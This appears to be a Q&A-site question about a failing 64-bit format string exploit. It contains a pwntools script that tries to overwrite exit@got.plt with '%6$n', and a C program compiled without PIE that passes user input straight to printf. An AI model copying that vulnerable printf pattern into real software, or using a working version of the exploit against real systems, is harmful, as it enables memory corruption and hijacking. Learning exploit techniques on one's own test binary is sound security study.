# how to write to adresses with format string exploit on 64bit

Tags: python, c, format-string

I did some 32bit format string exploits, and I wanted to get to 64bit. However I have the problem, that I can't/don*t know how to write to an adress on 64bit.

I have an exploit `x.py` which should write to exit@got.plt here:

```
from pwn import *

p = process("./vuln")
raw_input()
exit = 0x404028
p.sendline(p64(exit) + "%6$n")
sleep(1)
p.interactive()
```

The program is here (compiled with `-no-pie`):

```
#include <stdio.h>

int main() {
  char username[512];
  char password[512];

  fgets(username, sizeof(username), stdin);
  printf(username);

  fgets(password, sizeof(password), stdin);
  printf(password);

  exit(1);
}
```

When I attach gdb, check the value of exit@got.plt with `x/x <addr>`, and run the exploit, I get a segfault at `printf_positional`. And when I check the value of exit@got.plt again, the address is the same as before. Could someone please help me?